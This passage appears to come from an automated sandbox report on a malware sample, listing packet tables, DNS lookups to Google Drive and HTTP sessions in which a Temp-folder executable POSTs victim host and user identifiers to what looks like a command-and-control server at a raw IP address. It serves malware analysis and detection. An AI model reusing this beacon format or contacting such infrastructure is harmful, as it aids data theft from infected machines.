Jul 4, 2024 08:23:49.112864971 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.112952948 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112965107 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112981081 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.113006115 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.113029957 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.120404959 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.120417118 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.120434999 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.120493889 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.120559931 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.255228043 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.260430098 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.260500908 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.262815952 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.267622948 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.267667055 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.273258924 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422794104 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422821045 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422843933 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422868967 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422921896 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422928095 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.422941923 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422955990 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.422966003 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.423005104 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.423233032 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.424468994 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.424524069 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.424552917 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.424595118 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.424614906 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.424657106 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.429464102 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.429487944 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.429507971 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.429513931 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.429552078 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.429552078 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.429563046 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.429609060 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.429734945 CEST	80	49759	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.429781914 CEST	49759	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.568892002 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.573841095 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.574058056 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.576198101 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.580976009 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:52.581032038 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:52.585875988 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512862921 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512877941 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512897015 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512928963 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512939930 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512957096 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512974024 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.512981892 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.513015032 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.513217926 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.513226986 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.513237953 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.513268948 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.513288975 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.513300896 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.513335943 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.517775059 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.517815113 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.517826080 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.517837048 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.517868042 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.517898083 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.517904043 CEST	80	49760	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.517951965 CEST	49760	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.661825895 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.666759014 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.666848898 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.668996096 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.674117088 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:55.674304962 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:55.679451942 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484910011 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484932899 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484939098 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484946012 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484952927 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484965086 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484972000 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.484978914 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.485021114 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.485064983 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.485121012 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.485186100 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.485245943 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.485328913 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.489963055 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.490024090 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.490031004 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.490144968 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.490144968 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.490179062 CEST	80	49761	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.490233898 CEST	49761	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.636593103 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.641516924 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.641633987 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.644125938 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.648891926 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:59.648968935 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:59.653857946 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.586976051 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587033033 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587047100 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587080956 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:02.587205887 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587217093 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587234020 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587245941 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587266922 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587274075 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:02.587320089 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:02.587615967 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587626934 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.587661982 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:02.591996908 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.592027903 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.592041969 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.592067003 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:02.592114925 CEST	80	49762	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:02.592159986 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:02.593687057 CEST	49762	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:04.216032982 CEST	49763	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:04.221060038 CEST	80	49763	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:04.221153021 CEST	49763	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:04.224133968 CEST	49763	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:04.229084015 CEST	80	49763	45.61.136.239	192.168.2.4
Jul 4, 2024 08:24:04.229134083 CEST	49763	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:24:04.234252930 CEST	80	49763	45.61.136.239	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2024 08:22:41.857038975 CEST	49179	53	192.168.2.4	1.1.1.1
Jul 4, 2024 08:22:41.865051985 CEST	53	49179	1.1.1.1	192.168.2.4
Jul 4, 2024 08:22:43.090900898 CEST	64012	53	192.168.2.4	1.1.1.1
Jul 4, 2024 08:22:43.099220991 CEST	53	64012	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 4, 2024 08:22:41.857038975 CEST	192.168.2.4	1.1.1.1	0x79ac	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 08:22:43.090900898 CEST	192.168.2.4	1.1.1.1	0xd686	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 4, 2024 08:22:41.865051985 CEST	1.1.1.1	192.168.2.4	0x79ac	No error (0)	drive.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Jul 4, 2024 08:22:43.099220991 CEST	1.1.1.1	192.168.2.4	0xd686	No error (0)	drive.usercontent.google.com		142.250.185.97	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

45.61.136.239

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:22:46.615235090 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 176 Connection: close
Jul 4, 2024 08:22:46.622466087 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2CEH2FT
Jul 4, 2024 08:22:50.948400021 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:22:47 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:22:50.948419094 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:22:50.948440075 CEST	448	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:22:50.948468924 CEST	1236	IN	Data Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
Jul 4, 2024 08:22:50.948477983 CEST	1236	IN	Data Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
Jul 4, 2024 08:22:50.948499918 CEST	448	IN	Data Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
Jul 4, 2024 08:22:50.948723078 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:22:50.948734045 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:22:50.948751926 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:22:50.950061083 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:22:51.476463079 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 176 Connection: close
Jul 4, 2024 08:22:51.481913090 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2CccRDg
Jul 4, 2024 08:22:54.832844973 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:22:51 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:22:54.832878113 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:22:54.832891941 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
